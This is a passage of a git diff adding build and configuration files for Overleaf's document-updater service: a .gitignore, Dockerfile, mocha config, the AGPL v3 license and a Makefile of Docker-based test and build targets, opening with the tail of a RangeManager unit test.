this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + return it('should return true when the comment content changes', function () { + this.ranges_copy.comments[0].op.c = 'bar' + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + }) + }) +}) diff --git a/services/docstore/tsconfig.json b/services/docstore/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/docstore/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/document-updater/.gitignore b/services/document-updater/.gitignore new file mode 100644 index 0000000..624e78f --- /dev/null +++ b/services/document-updater/.gitignore @@ -0,0 +1,52 @@ +compileFolder + +Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### +*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? 
+Thumbs.db + +/node_modules/* + + + +forever/ + +**.swp + +# Redis cluster +**/appendonly.aof +**/dump.rdb +**/nodes.conf + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/document-updater/.mocharc.json b/services/document-updater/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/document-updater/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/document-updater/.nvmrc b/services/document-updater/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/document-updater/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/document-updater/Dockerfile b/services/document-updater/Dockerfile new file mode 100644 index 0000000..436d722 --- /dev/null +++ b/services/document-updater/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/document-updater + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/document-updater/package.json /overleaf/services/document-updater/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/document-updater/ /overleaf/services/document-updater/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/document-updater/LICENSE b/services/document-updater/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/document-updater/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. 
+ + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. 
+ + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 
+ + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. 
+ + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. 
+ + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. 
If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). 
To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. 
+ + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. 
+ + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/document-updater/Makefile b/services/document-updater/Makefile new file mode 100644 index 0000000..55f483f --- /dev/null +++ b/services/document-updater/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. 
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = document-updater +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! 
echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + 